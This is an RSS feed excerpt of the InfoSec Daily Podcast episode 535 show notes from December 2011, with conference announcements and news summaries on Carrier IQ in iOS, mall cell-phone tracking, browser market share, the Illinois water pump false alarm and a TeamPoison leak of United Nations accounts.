			<content:encoded><![CDATA[<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">InfoSec Daily Podcast Episode 535 for December 1, 2011. &nbsp;</span><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, and Adrian Crenshaw.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Announcements:</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad Smith (theNurse)</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">We all know and love Brad Smith, aka theNurse. &nbsp;His humor and smiling positivity is a wonderful example for our community. &nbsp;At Hacker Halted he had a massive stroke and has been in the hospital for almost a month.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &nbsp;Please feel free to check in for status or to donate. &nbsp;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.</span></p>
<p>	<a href="http://www.social-engineer.org/brad-smith-updates/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/brad-smith-updates/</span></a><br />
	<a href="http://www.social-engineer.org/bradsmithdonation/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/bradsmithdonation/</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">SANS Mentoring: Security 401 SANS Security Essentials Bootcamp Style</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Starts January 24, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Atlanta, GA</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Discount Code: </span><br />
	<a href="http://www.sans.org/mentor/details.php?nid=25484"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.sans.org/mentor/details.php?nid=25484</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">ShmooCon 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: January 27th-29th, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Washington Hilton Hotel, Washington, DC</span><br />
	<a href="http://www.shmoocon.org/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.shmoocon.org</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">AIDE 2012 </span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: May 21-25, 2012 </span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: MU Forensic Science Center</span><br />
	<a href="http://aide.marshall.edu/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://aide.marshall.edu</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The call for papers is open</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">DerbyCon 2012 &#8211; &quot;Dropping the Deuce&quot;</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;September 27-30, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Louisville, KY</span><br />
	<a href="http://www.derbycon.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.derbycon.com</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Thanks to everyone that has purchased products from Amazon through the affiliate program. &nbsp;If you&rsquo;re not familiar with the affiliate program, simply go to</span><a href="../"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.isdpodcast.com</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> and locate the Affiliate Program link on the right hand side.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><div class="awshortcode-carrousel align&amp;quot;right&amp;quot;"><object type="application/x-shockwave-flash" data="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" width="600" height="200"><param name="movie" value="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" /><param name="bgcolor" value="#fff" /><param name="quality" value="high" /><param name="allowscriptaccess" value="always" /><param name="wmode" value="transparent" /><p>You don't have a sufficient version of Flash Player to display this animation.</p></object></div></span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Stories:</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><a href="http://gizmodo.com/5864107/yes-your-iphone-is-tracking-you-with-carrieriq-too"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://gizmodo.com/5864107/yes-your-iphone-is-tracking-you-with-carrieriq-too</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">All hell broke loose yesterday when it was discovered that most (</span><a href="http://gizmodo.com/5864116/these-are-the-phones-were-pretty-sure-dont-have-carrier-iq?tag=stopspying"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">but not all</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">) Android phones (and BlackBerries, and others) are recording every keystroke you make. Now, references to the same software have been discovered in Apple&#39;s iOS. But in this case, it only logs technical data and it&#39;s off by default.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Last night, prominent iOS hacker chpwn tweeted that he had found reference to the same, now notorious Carrier IQ software in iOS 3. After just a little more poking and prodding, it was confirmed that these references exist all the way up to modern day iOS 5, they&#39;re just under a different name: </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:italic;font-variant:normal;text-decoration:none;vertical-align:baseline;">/usr/bin/awd_ice2</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">. But wait, before everyone starts returning their iPhones (none of you were going to do that anyway), there&#39;s a bit of good news.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">It seems that the data Carrier IQ has access to is much more limited than it is on Android. From chpwn&#39;s blog: &quot;&#8230;it does not appear the daemon has any access or communication with the UI layer, where text entry is done.&quot; That is extremely good news if it proves to be true, because it would mean that iOS wouldn&#39;t be logging your passwords, emails, SMS messages, etc. Even more good news: CarrierIQ only kicks in when the iPhone is in Diagnostic Mode, which is off by default. So you&#39;d have to actively tinker with settings you never use for it to work.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When activated, though, CarrierIQ does appear to log your name, phone number, carrier information, some info about the calls you are making, and your location (if Location Services are enabled). There may well be more, they just haven&#39;t found it yet. We&#39;ll update as we learn more.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><a href="http://www.wired.com/epicenter/2011/11/mall-pull-plug-cell-tracking/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.wired.com/epicenter/2011/11/mall-pull-plug-cell-tracking/</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">You may now shop two malls again without fear of individualized tracking&mdash;at least by your cell phone signal. Privacy concerns raised by US Senator Charles Schumer (D-NY) have ended plans by malls in southern California and Virginia to &ldquo;survey&rdquo; customers&rsquo; shopping habits by tracking their cell phone signals.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">As Ars Technica previously reported, Forest City, the mall developer that owns and operates the Promenade Temecula in Temecula, California and Short Pump Town Center in Richmond, Virginia had announced it would test technology in those two malls from Path Intelligence. Called Footpath, the system uses a series of cellular signal detectors to triangulate the movement of customers&rsquo; phones &mdash; and by extension, the customers themselves &mdash; through the mall&rsquo;s stores and other spaces. While the technology doesn&rsquo;t eavesdrop on cell phone users&rsquo; calls or record information about their phone numbers, it does use their cellular device&rsquo;s digital signature to track individuals.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The collected information is stored on Path Intelligence&rsquo;s servers, and made available through a secure Web portal to mall owners, providing them with a way of profiling which stores customers visit and where foot traffic &ldquo;hot spots&rdquo; are for those demographics to optimize display advertising and other marketing.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Forest City had planned to conduct the trial until the end of December. However, just a day after the trial began, Sen. Schumer contacted Forest City to raise his concerns. In a press conference on Sunday, Schumer said that the malls should have allowed customers to opt into the survey, rather than having to &ldquo;opt out&rdquo; by turning off their cell phones. &ldquo;A shopper&rsquo;s personal cell phone should not be used by a third party as a tracking device by retailers,&rdquo; Schumer said in a press conference on Sunday. &ldquo;Personal cell phones are just that &mdash; personal. If retailers want to tap into your phone to see what your shopping patterns are, they can ask you for your permission to do so.&rdquo;</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Schumer also sent a letter to Federal Trade Commission chairman Jon Leibowitz asking the FTC to look into whether Path&rsquo;s technology was legal in the U.S.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Forest City has not abandoned plans for the survey, however. In a statement, a Forest City spokesperson said that the company was suspending the trial until it came up with a way for customers to opt out easily. Path Intelligence CEO Sharon Biggar told CNNMoney that she hopes to discuss her company&rsquo;s technology with Schumer directly, and that it was fundamentally no different from the type of tracking that online retailers do with &ldquo;cookies&rdquo; and other behavioral marketing tools. &ldquo;We are simply seeking to level the playing field for offline retailers,&rdquo; she said. </span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><a href="http://techcrunch.com/2011/12/01/statcounter-chrome-takes-25-7-of-global-market-overtaking-firefox/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://techcrunch.com/2011/12/01/statcounter-chrome-takes-25-7-of-global-market-overtaking-firefox/</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">According to Web analytics company StatCounter, Google Chrome has surpassed Mozilla Firefox to become the second most used Web browser in the world after Internet Explorer.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">I&rsquo;m always a bit wary about StatCounter&rsquo;s claims, but I would be very surprised if Chrome </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:italic;font-variant:normal;text-decoration:none;vertical-align:baseline;">didn&rsquo;t</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> overtake Firefox at some point.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">In the UK, Chrome bumped Firefox to the third place back in July 2011 (also according to StatCounter).</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Indeed, the trends are crystal clear. StatCounter&rsquo;s research arm, StatCounter Global Stats, reports that Chrome took 25.7 percent of the worldwide market last month (up from a mere 4.66 percent in November 2009) compared to Firefox&rsquo;s 25.23 percent.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Microsoft&rsquo;s Internet Explorer maintains a strong lead with 40.63 percent globally (and even 50.66 percent in the United States), but the graph below shows both IE and Firefox declining fast.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">StatCounter says its statistics are based on aggregate data collected on a sample exceeding 15 billion page views per month (4 billion from the US) from a network of 3 million+ websites.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><a href="http://www.wired.com/threatlevel/2011/11/water-pump-hack-mystery-solved/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.wired.com/threatlevel/2011/11/water-pump-hack-mystery-solved/</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">It was the broken water pump heard &rsquo;round the world.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Cyberwar watchers took notice this month when a leaked intelligence memo claimed Russian hackers had remotely destroyed a water pump at an Illinois utility. The report spawned dozens of sensational stories characterizing it as the first-ever reported destruction of U.S. infrastructure by a hacker. Some described it as America&rsquo;s very own Stuxnet attack.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Except, it turns out, it wasn&rsquo;t. Within a week of the report&rsquo;s release, DHS bluntly contradicted the memo, saying that it could find no evidence that a hack occurred. In truth, the water pump simply burned out, as pumps are wont to do, and a government-funded intelligence center incorrectly linked the failure to an internet connection from a Russian IP address months earlier.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Now, in an exclusive interview with Threat Level, the contractor behind that Russian IP address says a single phone call could have prevented the string of errors that led to the dramatic false alarm.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&ldquo;I could have straightened it up with just one phone call, and this would all have been defused,&rdquo; said Jim Mimlitz, founder and owner of </span><a href="http://wireless-telemetry.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Navionics Research</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">, who helped set up the utility&rsquo;s control system. &rdquo;They assumed Mimlitz would never ever have been in Russia. They shouldn&rsquo;t have assumed that.&rdquo;</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Mimlitz&rsquo;s small integrator company helped set up the Supervisory Control and Data Acquisition system (SCADA) used by the Curran Gardner Public Water District outside of Springfield, Illinois, and provided occasional support to the district. His company specializes in SCADA systems, which are used to control and monitor infrastructure and manufacturing equipment.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Mimlitz says last June, he and his family were on vacation in Russia when someone from Curran Gardner called his cell phone seeking advice on a matter and asked Mimlitz to remotely examine some data-history charts stored on the SCADA computer.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Mimlitz, who didn&rsquo;t mention to Curran Gardner that he was on vacation in Russia, used his credentials to remotely log in to the system and check the data. He also logged in during a layover in Germany, using his mobile phone.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&ldquo;I wasn&rsquo;t manipulating the system or making any changes or turning anything on or off,&rdquo; Mimlitz told Threat Level.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">But five months later, when a water pump failed, that Russian IP address became the lead character in a 21st-century version of a Red Scare movie.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span></p>
<p>
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://www.darkreading.com/authentication/167901072/security/attacks-breaches/232200523/hacktivists-crack-united-nations-publish-user-data.html"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.darkreading.com/authentication/167901072/security/attacks-breaches/232200523/hacktivists-crack-united-nations-publish-user-data.html</span></a><br />
	<a href="http://nakedsecurity.sophos.com/2011/11/29/united-nations-hacked-email-addresses-and-passwords-leaked/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://nakedsecurity.sophos.com/2011/11/29/united-nations-hacked-email-addresses-and-passwords-leaked/</span></a><br />
	<a href="http://webcache.googleusercontent.com/search?q=cache:w1pWVkm8FhkJ:pastebin.com/FEcE9WzJ+&amp;cd=1&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://webcache.googleusercontent.com/search?q=cache:w1pWVkm8FhkJ:pastebin.com/FEcE9WzJ+&amp;cd=1&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">A hacktivist group called TeamPoison (TeaMP0isoN) has leaked more than 100 usernames, email addresses, and passwords belonging to the United Nations, claiming that the UN is guilty of corruption.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The user data appears to belong to individuals at the United Nations Development Programme (UNDP), Organisation for Economic Co-operation and Development (OECD), UNICEF, World Health Organisation (WHO), and other groups, according to news reports.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The gang noted, when publishing its stash on PasteBin, that some of the user IDs appeared to have a blank password.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Reports indicate that the hackers were able to take advantage of a vulnerability on the United Nations Development Program website to extract the IDs, email address, and passwords of users. The UN told reporters that the information obtained was from an old server and contains no current or valuable information. The accounts obtained are no longer active, the UN says.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The UN is not saying exactly how the attack occurred. &quot;The question now is how?,&quot; the hacktivist group said. &quot;We will let the so called &#39;security experts&#39; over at the UN figure that out. Have a nice day.&quot;</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">TeamPoison recently announced that it is joining forces with Anonymous on a new initiative dubbed &quot;Operation Robin Hood,&quot; targeting banks and financial institutions.</span></p>
<p>
	&nbsp;</p>
]]></content:encoded>
			<wfw:commentRss>http://www.isdpodcast.com/episode-535-ciqios-mall-tracking-abandoned-chrome-takeover-water-pump-follow-up-tea-teamp0ison/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
			<enclosure url="http://www.isdpodcast.com/podpress_trac/feed/3220/0/infosec-daily-podcast-episode-535.mp3" length="18309055" type="audio/mpeg" />
		<itunes:duration>0:38:06</itunes:duration>
		<itunes:subtitle>InfoSec Daily Podcast Episode 535 for December 1, 2011. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, and Adrian Crenshaw.
	Announcements:
	Brad Smith (theNurse)
	We all know and love Brad Smith, aka theNurse. &#160;His humor [...]</itunes:subtitle>
		<itunes:summary>InfoSec Daily Podcast Episode 535 for December 1, 2011. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, and Adrian Crenshaw.
	Announcements:
	Brad Smith (theNurse)
	We all know and love Brad Smith, aka theNurse. &#160;His humor and smiling positivity is a wonderful example for our community. &#160;At Hacker Halted he had a massive stroke and has been in the hospital for almost a month.
	Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &#160;Please feel free to check in for status or to donate. &#160;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.
	http://www.social-engineer.org/brad-smith-updates/
	http://www.social-engineer.org/bradsmithdonation/
	SANS Mentoring: Security 401 SANS Security Essentials Bootcamp Style
	When: Starts January 24, 2012
	Where: Atlanta, GA
	Discount Code: 
	http://www.sans.org/mentor/details.php?nid=25484
	ShmooCon 2012
	When: January 27th-29th, 2012
	Where: Washington Hilton Hotel, Washington, DC
	http://www.shmoocon.org
	AIDE 2012 
	When: May 21-25, 2012 
	Where: MU Forensic Science Center
	http://aide.marshall.edu
	The call for papers is open
	DerbyCon 2012 &#8211; &#34;Dropping the Deuce&#34;
	When: &#160;September 27-30, 2012
	Where: Louisville, KY
	http://www.derbycon.com
	Thanks to everyone that has purchased products from Amazon through the affiliate program. &#160;If you&#8217;re not familiar with the affiliate program, simply go to http://www.isdpodcast.com and locate the Affiliate Program link on the right hand side.
	You don't have a sufficient version of Flash Player to display this animation.
	Stories:
	Source: http://gizmodo.com/5864107/yes-your-iphone-is-tracking-you-with-carrieriq-too
	All hell broke loose yesterday when it was discovered that most (but not all) Android phones (and BlackBerries, and others) are recording every keystroke you make. Now, references to the same software have been discovered in Apple&#39;s iOS. But in this case, it only logs technical data and it&#39;s off by default.
	Last night, prominent iOS hacker chpwn tweeted that he had found reference to the same, now notorious Carrier IQ software in iOS 3. After just a little more poking and prodding, it was confirmed that these references exist all the way up to modern day iOS 5, they&#39;re just under a different name: /usr/bin/awd_ice2. But wait, before everyone starts returning their iPhones (none of you were going to do that anyway), there&#39;s a bit of good news.
	It seems that the data Carrier IQ has access to is much more limited than it is on Android. From chpwn&#39;s blog: &#34;&#8230;it does not appear the daemon has any access or communication with the UI layer, where text entry is done.&#34; That is extremely good news if it proves to be true, because it would mean that iOS wouldn&#39;t be logging your passwords, emails, SMS messages, etc. Even more good news: CarrierIQ only kicks in when the iPhone is in Diagnostic Mode, which is off by default. So you&#39;d have to actively tinker with settings you never use for it to work.
	When activated, though, CarrierIQ does appear to log your name, phone number, carrier information, some info about the calls you are making, and your location (if Location Services are enabled). There may well be more, they just haven&#39;t found it yet. We&#39;ll update as we learn more.
	Source: http://www.wired.com/epicenter/2011/11/mall-pull-plug-cell-tracking/
	You may now shop two malls again without fear of individualized tracking&#8212;at least by your cell phone signal. Privacy concerns raised by US Senator Charles Schumer (D-NY) have ended plans by malls in southern California and Virginia to &#8220;survey&#8221; customers&#8217; shopping habits by tracking their cell phone signals.
	As Ars Technica previously reported, Forest City, the mall developer that owns and operates the Promenade Temecula in Temecula, California and Short Pump [...]</itunes:summary>
		<itunes:keywords>Podcast</itunes:keywords>
		<itunes:author>Rick Hayes with Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Themson Mester, and Dr. Bonez.</itunes:author>
		<itunes:explicit>no</itunes:explicit>
		<itunes:block>no</itunes:block>
	</item>
		<item>
		<title>Episode 534 &#8211; Deceived Hacker, 15 Years For 1 Click, We’re No. 1!, Banned In The UK, Cure Worse Than The Disease and EU: ISP’s Aren’t Content Police</title>
		<link>http://www.isdpodcast.com/episode-534-deceived-hacker-15-years-for-1-click-we%e2%80%99re-no-1-banned-in-the-uk-cure-worse-than-the-disease-and-eu-isp%e2%80%99s-aren%e2%80%99t-content-police</link>
		<comments>http://www.isdpodcast.com/episode-534-deceived-hacker-15-years-for-1-click-we%e2%80%99re-no-1-banned-in-the-uk-cure-worse-than-the-disease-and-eu-isp%e2%80%99s-aren%e2%80%99t-content-police#comments</comments>
